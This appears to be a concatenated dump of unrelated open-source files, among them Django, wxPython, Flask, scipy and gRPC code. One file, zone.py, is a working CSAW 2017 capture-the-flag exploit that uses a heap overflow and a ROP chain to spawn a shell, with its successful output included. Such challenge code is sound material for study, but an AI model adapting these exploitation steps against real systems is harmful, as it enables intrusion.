bonedict['scale'][1].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.y))
bonedict['scale'][1].keyframe_points[-1].handle_right = co + Vector((1, tgR.y))
posebone.keyframe_insert('scale', 1)
if not math.isnan(vct.z):
posebone.scale[2] = vct.z
co = bonedict['scale'][2].keyframe_points[-1].co
bonedict['scale'][2].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.z))
bonedict['scale'][2].keyframe_points[-1].handle_right = co + Vector((1, tgR.z))
posebone.keyframe_insert('scale', 2)
return arm_obj.animation_data.action
| gpl-3.0 | 5,015,250,740,609,675,000 | 39.481262 | 111 | 0.53735 | false |
CFIS-Octarine/octarine | validate/gui/views/errorhandling.py | 1 | 5325 | __author__ = "David Rusk <[email protected]>"
import wx
class CertificateDialog(wx.Dialog):
def __init__(self, parent, handler, error_message):
super(CertificateDialog, self).__init__(parent, title="Certificate Error")
self.handler = handler
self.error_message = error_message
self._init_ui()
self._do_layout()
def _init_ui(self):
self.header_text = wx.StaticText(self, label="An error has occured "
"which likely indicates "
"your CADC certificate "
"is invalid:")
self.error_text = wx.StaticText(self, label=self.error_message)
error_font = wx.Font(12, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_ITALIC,
wx.FONTWEIGHT_NORMAL)
self.error_text.SetFont(error_font)
self.prompt_text = wx.StaticText(self, label="Enter your CADC "
"credentials to get a "
"new certificate:")
self.username_label = wx.StaticText(self, label="CADC Username: ")
self.username_field = wx.TextCtrl(self)
self.password_label = wx.StaticText(self, label="Password: ")
self.password_field = wx.TextCtrl(self, style=wx.TE_PASSWORD)
self.accept_button = wx.Button(self, label="Get certificate")
self.cancel_button = wx.Button(self, label="Cancel")
self.accept_button.Bind(wx.EVT_BUTTON, self.on_accept)
self.cancel_button.Bind(wx.EVT_BUTTON, self.on_cancel)
self.username_field.SetFocus()
self.accept_button.SetDefault()
def _do_layout(self):
vsizer = wx.BoxSizer(wx.VERTICAL)
flag = wx.ALIGN_CENTER | wx.ALL
border = 10
vsizer.Add(self.header_text, flag=flag, border=border)
vsizer.Add(self.error_text, flag=flag, border=border)
line = wx.StaticLine(self, -1, size=(20, -1), style=wx.LI_HORIZONTAL)
vsizer.Add(line, flag=wx.GROW | wx.ALIGN_CENTER_VERTICAL | wx.RIGHT | wx.TOP, border=5)
vsizer.Add(self.prompt_text, flag=flag, border=border)
input_sizer = wx.FlexGridSizer(cols=2, hgap=5, vgap=border)
input_sizer.Add(self.username_label)
input_sizer.Add(self.username_field, proportion=1, flag=wx.EXPAND)
input_sizer.Add(self.password_label, wx.EXPAND)
input_sizer.Add(self.password_field, proportion=1, flag=wx.EXPAND)
input_sizer.AddGrowableCol(1, proportion=1)
vsizer.Add(input_sizer, flag=wx.EXPAND)
button_sizer = wx.BoxSizer(wx.HORIZONTAL)
button_sizer.Add(self.accept_button, flag=wx.RIGHT, border=5)
button_sizer.Add(self.cancel_button, flag=wx.LEFT, border=5)
vsizer.Add(button_sizer, flag=flag, border=border)
padding_sizer = wx.BoxSizer(wx.HORIZONTAL)
padding_sizer.Add(vsizer, flag=wx.ALL, border=20)
self.SetSizerAndFit(padding_sizer)
def on_cancel(self, event):
self.Close()
def on_accept(self, event):
username = self.username_field.GetValue()
password = self.password_field.GetValue()
self.handler.refresh_certificate(username, password)
self.Close()
class RetryDownloadDialog(wx.Dialog):
def __init__(self, parent, handler, error_message):
super(RetryDownloadDialog, self).__init__(parent, title="Download Error")
self.handler = handler
self.error_message = error_message
self._init_ui()
self._do_layout()
def _init_ui(self):
self.header_text = wx.StaticText(self, label="One or more downloads "
"failed:")
self.error_text = wx.StaticText(self, label=self.error_message)
error_font = wx.Font(12, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_ITALIC,
wx.FONTWEIGHT_NORMAL)
self.error_text.SetFont(error_font)
self.retry_button = wx.Button(self, label="Retry")
self.cancel_button = wx.Button(self, label="Cancel")
self.retry_button.Bind(wx.EVT_BUTTON, self.on_accept)
self.cancel_button.Bind(wx.EVT_BUTTON, self.on_cancel)
self.retry_button.SetDefault()
def _do_layout(self):
vsizer = wx.BoxSizer(wx.VERTICAL)
flag = wx.ALIGN_CENTER | wx.ALL
border = 10
vsizer.Add(self.header_text, flag=flag, border=border)
vsizer.Add(self.error_text, flag=flag, border=border)
line = wx.StaticLine(self, -1, size=(20, -1), style=wx.LI_HORIZONTAL)
vsizer.Add(line, flag=wx.GROW | wx.ALIGN_CENTER_VERTICAL | wx.RIGHT | wx.TOP, border=5)
button_sizer = wx.BoxSizer(wx.HORIZONTAL)
button_sizer.Add(self.retry_button, flag=wx.RIGHT, border=5)
button_sizer.Add(self.cancel_button, flag=wx.LEFT, border=5)
vsizer.Add(button_sizer, flag=flag, border=border)
padding_sizer = wx.BoxSizer(wx.HORIZONTAL)
padding_sizer.Add(vsizer, flag=wx.ALL, border=20)
self.SetSizerAndFit(padding_sizer)
def on_cancel(self, event):
self.Close()
def on_accept(self, event):
self.handler.retry_downloads()
self.Close() | gpl-3.0 | -8,906,130,566,601,220,000 | 36.244755 | 95 | 0.604131 | false |
firebase/grpc-SwiftPM | src/python/grpcio_tests/tests_aio/unit/init_test.py | 1 | 1698 | # Copyright 2019 The gRPC Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import unittest
import grpc
from grpc.experimental import aio
from tests_aio.unit._test_server import start_test_server
from tests_aio.unit._test_base import AioTestBase
class TestInsecureChannel(AioTestBase):
async def test_insecure_channel(self):
server_target, _ = await start_test_server() # pylint: disable=unused-variable
channel = aio.insecure_channel(server_target)
self.assertIsInstance(channel, aio.Channel)
class TestSecureChannel(AioTestBase):
"""Test a secure channel connected to a secure server"""
def test_secure_channel(self):
async def coro():
server_target, _ = await start_test_server(secure=True) # pylint: disable=unused-variable
credentials = grpc.local_channel_credentials(
grpc.LocalConnectionType.LOCAL_TCP)
secure_channel = aio.secure_channel(server_target, credentials)
self.assertIsInstance(secure_channel, aio.Channel)
self.loop.run_until_complete(coro())
if __name__ == '__main__':
logging.basicConfig()
unittest.main(verbosity=2)
| apache-2.0 | -660,082,624,246,504,200 | 32.294118 | 102 | 0.717314 | false |
aggrent/cab | cab/migrations/0002_migrate_ratings.py | 1 | 7081 | # encoding: utf-8
from south.v2 import DataMigration
from django.contrib.contenttypes.models import ContentType
from django.db.models import signals
from ratings.models import RatedItem, SimilarItem
class Migration(DataMigration):
def forwards(self, orm):
signals.post_save.disconnect(sender=RatedItem, dispatch_uid='update_rating_score')
try:
ctype = ContentType.objects.get(app_label='cab', model='snippet')
except ContentType.DoesNotExist:
# If the content type doesn't even exist yet, this is probably a fresh installation
return
for rating in orm['cab.rating'].objects.all():
RatedItem.objects.create(
user_id=rating.user.pk,
object_id=rating.snippet.pk,
content_type=ctype,
score=rating.score)
def backwards(self, orm):
RatedItem.objects.all().delete()
SimilarItem.objects.all().delete()
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'cab.bookmark': {
'Meta': {'object_name': 'Bookmark'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'snippet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmarks'", 'to': "orm['cab.Snippet']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'cab_bookmarks'", 'to': "orm['auth.User']"})
},
'cab.language': {
'Meta': {'object_name': 'Language'},
'file_extension': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language_code': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'mime_type': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
},
'cab.rating': {
'Meta': {'object_name': 'Rating'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'score': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'snippet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'ratings'", 'to': "orm['cab.Snippet']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'cab_ratings'", 'to': "orm['auth.User']"})
},
'cab.snippet': {
'Meta': {'object_name': 'Snippet'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'bookmark_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'code': ('django.db.models.fields.TextField', [], {}),
'description': ('django.db.models.fields.TextField', [], {}),
'description_html': ('django.db.models.fields.TextField', [], {}),
'highlighted_code': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cab.Language']"}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'rating_score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['cab']
| bsd-3-clause | -4,519,894,992,598,839,300 | 63.963303 | 163 | 0.551758 | false |
integeruser/on-pwning | 2017-csaw-quals/Zone/zone.py | 1 | 3639 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
context(arch='amd64', os='linux', aslr=True, terminal=['tmux', 'neww'])
if args['GDB']:
elf, libc = ELF('./zone-amd64-2.23-0ubuntu9'), ELF('libs/amd64/2.23/0ubuntu9/libc-2.23.so')
io = gdb.debug('./zone-amd64-2.23-0ubuntu9', gdbscript='''\
c
''')
elif args['REMOTE']:
elf, libc = ELF('./zone'), ELF('libs/amd64/2.23/0ubuntu9/libc-2.23.so')
io = remote('pwn.chal.csaw.io', 5223)
else:
elf, libc = ELF('./zone-amd64-2.23-0ubuntu9'), ELF('libs/amd64/2.23/0ubuntu9/libc-2.23.so')
io = process(['stdbuf', '-i0', '-o0', '-e0', './zone-amd64-2.23-0ubuntu9'])
def allocate(size):
io.recvuntil('5) Exit\n')
io.sendline('1')
io.sendline(str(size))
def delete_last():
io.recvuntil('5) Exit\n')
io.sendline('2')
io.recvuntil('Free')
def write_last(data, newline=True):
io.recvuntil('5) Exit\n')
io.sendline('3')
io.sendline(data) if newline else io.send(data)
def print_last():
io.recvuntil('5) Exit\n')
io.sendline('4')
return io.recvline()
io.recvuntil('Environment setup: ')
stack_leak_address = int(io.recvline(), 16)
success('stack leak address: %s' % hex(stack_leak_address))
# a chunk is of the form
# {size|ptr to the next free chunk of same size|data}
# allocate a 0x40 byte block
allocate(0x40)
# overflow the 65th byte of the block to be 0x80, so to modify the size of the next free block
write_last('A' * 0x40 + chr(0x80), newline=False)
# allocate another 0x40 byte block (the one with the size modified)
allocate(0x40)
# free this last block (which will be put at the top of the list of free chunks of size 0x80)
delete_last()
# allocate a chunk of size 0x80 to get this chunk
allocate(0x80)
# we can now write 0x80 characters into a chunk which is in the list of chunks of size 0x40
# so we can overflow in the next 0x40 chunk and mess its pointer to the next free chunk
write_last(fit({cyclic_find('jaaaaaaa', n=8): p64(stack_leak_address + 0x80 - 0x8)}))
# allocate two more 0x40 chunks
# the second chunk will be in the stack (since, in the first chunk, we changed the pointer to the next free)
allocate(0x40)
allocate(0x40)
# print the content of the chunk to leak an address from libc
libc_leak_address = u64(print_last()[:6].ljust(8, '\x00'))
success('libc leak address: %s' % hex(libc_leak_address))
libc.address = libc_leak_address - (libc.symbols['__libc_start_main'] + 240)
success('libc address: %s' % hex(libc.address))
rop = ROP(libc)
rop.system(next(libc.search('/bin/sh')))
print rop.dump()
# write in the chunk to change the return address
write_last(bytes(rop))
# exit to return to execute the rop chain
io.recvuntil('5) Exit\n')
io.sendline('5')
io.interactive()
# $ ./zone.py REMOTE
# [+] Opening connection to pwn.chal.csaw.io on port 5223: Done
# [*] '/home/ubuntu/vbox/zone'
# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: No PIE (0x400000)
# [*] '/home/ubuntu/vbox/libc-amd64-2.23-0ubuntu9.so'
# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
# [+] stack leak address: 0x7ffd63409140
# [+] libc leak address: 0x7efc0b64a830
# [+] libc address: 0x7efc0b62a000
# [*] Loaded cached gadgets for './libc-amd64-2.23-0ubuntu9.so'
# 0x0000: 0x7efc0b64b102 pop rdi; ret
# 0x0008: 0x7efc0b7b6d17
# 0x0010: 0x7efc0b66f390 system
# 0x0018: 'gaaahaaa' <pad>
# [*] Switching to interactive mode
# $ ls
# flag
# zone
# $ cat flag
# flag{d0n7_let_m3_g3t_1n_my_z0n3}
| mit | 7,253,582,822,140,688,000 | 30.921053 | 108 | 0.663094 | false |
apbard/scipy | scipy/constants/tests/test_constants.py | 2 | 3115 | from __future__ import division, print_function, absolute_import
from numpy.testing import assert_equal, assert_allclose
from scipy._lib._numpy_compat import suppress_warnings
import scipy.constants as sc
def test_convert_temperature():
assert_equal(sc.convert_temperature(32, 'f', 'Celsius'), 0)
assert_equal(sc.convert_temperature([0, 0], 'celsius', 'Kelvin'),
[273.15, 273.15])
assert_equal(sc.convert_temperature([0, 0], 'kelvin', 'c'),
[-273.15, -273.15])
assert_equal(sc.convert_temperature([32, 32], 'f', 'k'), [273.15, 273.15])
assert_equal(sc.convert_temperature([273.15, 273.15], 'kelvin', 'F'),
[32, 32])
assert_equal(sc.convert_temperature([0, 0], 'C', 'fahrenheit'), [32, 32])
assert_allclose(sc.convert_temperature([0, 0], 'c', 'r'), [491.67, 491.67],
rtol=0., atol=1e-13)
assert_allclose(sc.convert_temperature([491.67, 491.67], 'Rankine', 'C'),
[0., 0.], rtol=0., atol=1e-13)
assert_allclose(sc.convert_temperature([491.67, 491.67], 'r', 'F'),
[32., 32.], rtol=0., atol=1e-13)
assert_allclose(sc.convert_temperature([32, 32], 'fahrenheit', 'R'),
[491.67, 491.67], rtol=0., atol=1e-13)
assert_allclose(sc.convert_temperature([273.15, 273.15], 'K', 'R'),
[491.67, 491.67], rtol=0., atol=1e-13)
assert_allclose(sc.convert_temperature([491.67, 0.], 'rankine', 'kelvin'),
[273.15, 0.], rtol=0., atol=1e-13)
def test_fahrenheit_to_celsius():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`F2C` is deprecated!")
assert_equal(sc.F2C(32), 0)
assert_equal(sc.F2C([32, 32]), [0, 0])
def test_celsius_to_kelvin():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`C2K` is deprecated!")
assert_equal(sc.C2K([0, 0]), [273.15, 273.15])
def test_kelvin_to_celsius():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`K2C` is deprecated!")
assert_equal(sc.K2C([0, 0]), [-273.15, -273.15])
def test_fahrenheit_to_kelvin():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`F2K` is deprecated!")
sup.filter(DeprecationWarning, "`F2C` is deprecated!")
sup.filter(DeprecationWarning, "`C2K` is deprecated!")
assert_equal(sc.F2K([32, 32]), [273.15, 273.15])
def test_kelvin_to_fahrenheit():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`K2F` is deprecated!")
sup.filter(DeprecationWarning, "`K2C` is deprecated!")
sup.filter(DeprecationWarning, "`C2F` is deprecated!")
assert_equal(sc.K2F([273.15, 273.15]), [32, 32])
def test_celsius_to_fahrenheit():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`C2F` is deprecated!")
assert_equal(sc.C2F([0, 0]), [32, 32])
def test_lambda_to_nu():
assert_equal(sc.lambda2nu(sc.speed_of_light), 1)
def test_nu_to_lambda():
assert_equal(sc.nu2lambda(1), sc.speed_of_light)
| bsd-3-clause | 973,531,989,903,674,900 | 38.43038 | 79 | 0.608026 | false |
longaccess/longaccess-client | lacli/upload.py | 1 | 8840 | from lacli.exceptions import PauseEvent
from lacli.pool import MPUpload
from lacli.source.chunked import ChunkedFile
from lacore.storage.s3 import MPConnection
from lacore.api import UploadState as BaseUploadState
from contextlib import contextmanager
from lacli.log import getLogger
from lacli.progress import queueHandler
from lacli.control import ControlHandler
from lacli.worker import WorkerPool
from lacore.async import block
from twisted.internet import defer, threads
from itertools import count
from multiprocessing import TimeoutError
from multiprocessing import get_logger as mp_logging_init
import errno
import signal
class LogHandler(queueHandler):
def __init__(self, logger='lacli'):
self.logger = getLogger(logger)
def handle(self, msg):
self.logger.handle(msg)
class UploadState(BaseUploadState):
states = None
@classmethod
def has_state(cls, fname):
if cls.states is None:
cls.setup()
if fname in cls.states:
return True
return False
@classmethod
def init(cls, cache):
cls.cache = cache
@classmethod
def setup(cls):
uploads = cls.cache._get_uploads()
a = cls.cache._for_adf('archives')
sz = lambda f: a[f]['archive'].meta.size
cls.states = {k: cls(k, sz(k), **v)
for k, v in uploads.iteritems()
if k in a}
@classmethod
def get(cls, fname, size=None, capsule=None, sandbox=False):
if cls.states is None:
cls.setup()
if fname in cls.states:
state = cls.states[fname]
msg = "Can't change {} for upload"
if size is not None:
assert state.size == size, msg.format('size')
cls.states[fname].size = size
if capsule is not None:
# might be helpful if you want to change the capsule
if state.capsule is None:
state.capsule = capsule
cid = state.capsule.get('id', None)
assert cid == capsule['id'], msg.format('capsule')
cls.states[fname].capsule = capsule
if sandbox is True:
assert state.sandbox == sandbox, msg.format('sandbox status')
cls.states[fname].sandbox = True
return cls.states[fname]
cls.states[fname] = UploadState(fname, size, capsule=capsule,
sandbox=sandbox)
return cls.states[fname]
@classmethod
def reset(cls, fname):
if cls.states is None:
cls.setup()
if fname not in cls.states:
raise ValueError("Upload doesn't exist!")
cls.cache._del_upload(fname)
return cls.states.pop(fname)
def __init__(self, archive, size, keys=[],
exc=None, paused=True, **kwargs):
super(UploadState, self).__init__(archive, size, **kwargs)
self.cache = type(self).cache
self.logfile = self.control = None
self.keys = keys
self.progress = reduce(lambda x, y: x + y['size'], self.keys, 0)
self.pausing = False
self._paused = paused
self.exc = exc
self.deferred_upload = None
def __enter__(self):
try:
self.exc = None
self.control = ControlHandler()
self.logfile = self.cache._upload_open(self.archive, mode='r+')
getLogger().debug("Found state file for %s", self.archive)
except IOError as e:
if e.errno == errno.ENOENT:
getLogger().debug("Creating state file for %s", self.archive)
self.logfile = self.cache._upload_open(self.archive, mode='w+')
else:
raise e
# update keys from file
upload = self.cache._validate_upload(self.logfile)
self.uri = upload.get('uri', self.uri)
self.keys = upload.get('keys', self.keys)
if self._paused is True:
self._paused = False
self.cache._write_upload(
self.uri, self.capsule, self.logfile,
self.exc, self._paused)
return self
@block
@defer.inlineCallbacks
def wait_for_upload(self):
try:
result = yield self.deferred_upload
defer.returnValue(result)
except PauseEvent:
pass
if self.pausing is True:
self.paused()
def __exit__(self, type, value, traceback):
if type is not None:
if type == PauseEvent:
getLogger().debug("upload paused.")
self.paused()
else:
getLogger().debug("error in upload", exc_info=True)
self.error(value)
if self.logfile is not None:
self.logfile.close()
self.logfile = self.control = None
return type is None
def keydone(self, key, size):
assert self.logfile is not None, "Log not open"
self.keys.append(
self.cache._checkpoint_upload(key, size, self.logfile))
def update(self, progress):
self.progress = progress
@property
def seq(self):
return len(self.keys)
def pause(self):
if not self.pausing and self.control is not None:
self.control.pause()
self.pausing = True
def paused(self):
getLogger().debug("upload state paused")
if self.exc is not None:
getLogger().debug("can't pause a failed upload")
return
self._paused = True
if self.pausing is True:
self.pausing = False
self.cache._write_upload(
self.uri, self.capsule, self.logfile,
self.exc, self._paused)
def active(self):
return self._paused is False and self.exc is None
def signal(self, sig, frame):
getLogger().debug("Got interrupt")
if sig == signal.SIGINT:
getLogger().debug("Pausing")
if self.pausing is True:
raise SystemExit("Interrupted")
self.pausing = True
self.control.pause()
def save_op(self, op):
assert self.uri is None, "Can't change URI for upload state"
if op.uri is None:
return
self.cache._write_upload(op.uri, self.capsule, self.logfile,
self.exc, self._paused)
self.uri = op.uri
def error(self, exc):
if self.exc is None:
self.cache._write_upload(self.uri, self.capsule,
self.logfile, str(exc), self._paused)
self.exc = exc
class Upload(object):
def __init__(self, session, nprocs, debug, state):
self.prefs = {
'nprocs': nprocs,
'debugworker': debug > 2
}
self.log = LogHandler()
self.state = state
@contextmanager
def _workers(self, progq):
with self.log as logq:
with self.state.control as ctrlq:
mp_logging_init()
pool = WorkerPool(
self.prefs, logq, progq, ctrlq)
try:
yield pool
finally:
getLogger().debug("terminating pool")
pool.terminate()
pool.join()
def upload_temp(self, token, source, etags, pool, seq):
key = "temp-archive-{seq}".format(seq=seq)
connection = MPConnection(**token)
with MPUpload(connection, source, key) as uploader:
etags[key], source = uploader.get_result(
uploader.submit_job(pool))
return source
@defer.inlineCallbacks
def upload(self, fname, upload, progq):
with self._workers(progq) as pool:
etags = {}
source = ChunkedFile(fname, self.state.progress)
token = yield upload.status
for seq in count(start=self.state.seq):
try:
source = yield threads.deferToThread(
self.upload_temp, token, source, etags, pool, seq)
except PauseEvent:
getLogger().debug(
"paused after uploading %d temporary keys", seq)
raise
except TimeoutError:
getLogger().debug(
"timeout after uploading %d temporary keys", seq)
token = yield upload.status
if source is None:
getLogger().debug("uploaded entire archive")
break
getLogger().debug("uploaded %d temp keys", len(etags))
for key, tag in etags.iteritems():
getLogger().debug("key: %s (etag: %s)", key, tag)
# vim: et:sw=4:ts=4
| apache-2.0 | 7,196,664,246,178,638,000 | 33.131274 | 79 | 0.552262 | false |
MukunthanAlagarsamy/UCC_attempt1 | app.py | 1 | 1772 | #!/usr/bin/env python
import urllib
import json
import os
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print("Request:")
print(json.dumps(req, indent=4))
res = makeWebhookResult(req)
res = json.dumps(res, indent=4)
print(res)
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
def makeWebhookResult(req):
if req.get("result").get("action") != "shipping.cost":
return {}
if req.get("result").get("action") == "shipping.cost":
result = req.get("result")
parameters = result.get("parameters")
zone = parameters.get("shipping-zone")
cost = {'Europe':100, 'North America':200, 'South America':300, 'Asia':400, 'Africa':500}
speech = "The cost of shipping to " + zone + " is " + str(cost[zone]) + " euros."
if req.get("result").get("action") == "product.identification":
# result = req.get("result")
# parameters = result.get("parameters")
# zone = parameters.get("producttype")
# cost = {'TV':100, 'Mobile':"Whats the problem with your Mobile", 'Bank':'Whats the problem with your Bank'}
speech = "Thank u"
print("Response:")
print(speech)
return {
"speech": speech,
"displayText": speech,
#"data": {},
# "contextOut": [],
"source": "apiai-onlinestore-shipping"
}
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print "Starting app on port %d" % port
app.run(debug=True, port=port, host='0.0.0.0')
| apache-2.0 | 590,739,204,705,281,700 | 25.447761 | 116 | 0.597065 | false |
ProstoKSI/django-weed | djweed/db_fields.py | 1 | 2767 | from django.contrib.contenttypes.models import ContentType
try:
from django.core.urlresolvers import reverse
except ImportError: # Django 2.0
from django.urls import reverse
from django.db.models.fields.files import FieldFile, FileField
from django.utils import six
from .storage import WeedFSStorage
class WeedFSFieldFile(FieldFile):
def _split_name(self):
splitted_name = self.name.split(':', 1)
if len(splitted_name) == 2:
return splitted_name
return splitted_name[0], ''
def _get_storage_fid(self):
return self._split_name()[0]
storage_fid = property(_get_storage_fid)
def _get_verbose_name(self):
return self._split_name()[1]
verbose_name = property(_get_verbose_name)
def _get_content(self):
self._require_file()
return self.storage.content(self.storage_fid)
content = property(_get_content)
def _get_url(self):
self._require_file()
content_type = ContentType.objects.get_for_model(self.instance._meta.model)
return reverse('weedfs_get_file', kwargs={
'content_type_id': content_type.id,
'object_id': self.instance.id,
'field_name': self.field.name,
'file_name': self.verbose_name,
})
url = property(_get_url)
def _get_storage_url(self):
self._require_file()
return self.storage.url(self.storage_fid)
storage_url = property(_get_storage_url)
class WeedFSFileField(FileField):
# The class to wrap instance attributes in. Accessing the file object off
# the instance will always return an instance of attr_class.
attr_class = WeedFSFieldFile
def __init__(self, verbose_name=None, name=None, storage=None, **kwargs):
kwargs.pop('upload_to', None)
storage = kwargs.pop('storage', None)
if storage is None:
storage = WeedFSStorage()
super(WeedFSFileField, self).__init__(verbose_name, name,
storage=storage, **kwargs)
def get_prep_value(self, value):
"Returns field's value prepared for saving into a database."
# Need to convert File objects provided via a form to unicode for database insertion
if value is None:
return None
if isinstance(value, six.string_types):
return six.text_type(value)
if value.name == '':
return ''
if isinstance(value, WeedFSFieldFile):
return value.name
return self.storage.save(None, value)
def south_field_triple(self):
from south.modelsinspector import introspector
field_class = "django.db.models.fields.CharField"
args, kwargs = introspector(self)
return (field_class, args, kwargs)
| mit | 4,202,618,077,747,209,000 | 32.743902 | 92 | 0.641128 | false |
COCS4950G7/COSC4950 | Resources/Tkinter Examples/Tkinter_example.py | 1 | 1256 |
#import Tkinter
#l = Tkinter.Label(text = "***************************See me?*************************")
#l.pack()
#l.mainloop()
#print("Howdy")
#omfg
#print("dostuff")
# http://www.ferg.org/thinking_in_tkinter/all_programs.html
from Tkinter import *
class MyApp:
def __init__(self, parent):
self.myParent = parent ### (7) remember my parent, the root
self.myContainer1 = Frame(parent)
self.myContainer1.pack()
self.button1 = Button(self.myContainer1)
self.button1.configure(text="OK", background= "green")
self.button1.pack(side=LEFT)
self.button1.bind("<Button-1>", self.button1Click) ### (1)
self.button2 = Button(self.myContainer1)
self.button2.configure(text="Cancel", background="red")
self.button2.pack(side=RIGHT)
self.button2.bind("<Button-1>", self.button2Click) ### (2)
def button1Click(self, event): ### (3)
if self.button1["background"] == "green": ### (4)
self.button1["background"] = "yellow"
else:
self.button1["background"] = "green"
def button2Click(self, event): ### (5)
self.myParent.destroy() ### (6)
root = Tk()
myapp = MyApp(root)
root.mainloop() | gpl-3.0 | 5,148,761,549,873,680,000 | 19.95 | 88 | 0.57086 | false |
barthoekstra/Orographic-Landscape-Navigator | gisactions.py | 1 | 1466 | #!/usr/bin/python
# This code is simply a wrapper for running gdal commands, without MATLAB
# causing issues with dependencies, etc.
import sys
import os
print(sys.argv[0])
action = sys.argv[1]
targetfile = sys.argv[2]
if action == "merge":
print('Mergeing...')
# gdalbuildvrt merged.vrt r14bn2.wgs84.tif r14en1.wgs84.tif r14ez1.wgs84.tif r14bz2.wgs84.tif r14bz1.wgs84.tif r14bn1.wgs84.tif r09dz1.wgs84.tif r09dz2.wgs84.tif r09gz1.wgs84.tif
# gdalbuildvrt output.vrt files-to-be-merged.tif separated-by-spaces.tif
# python gisactions.py merge data/dem/output.vrt data/dem/r14bn2.wgs84.tif data/dem/r14bn1.wgs84.tif
# First create a virtual mosaic
# Cmd format: gdalbuildvrt output.vrt file1.tif file2.tif file3.tif
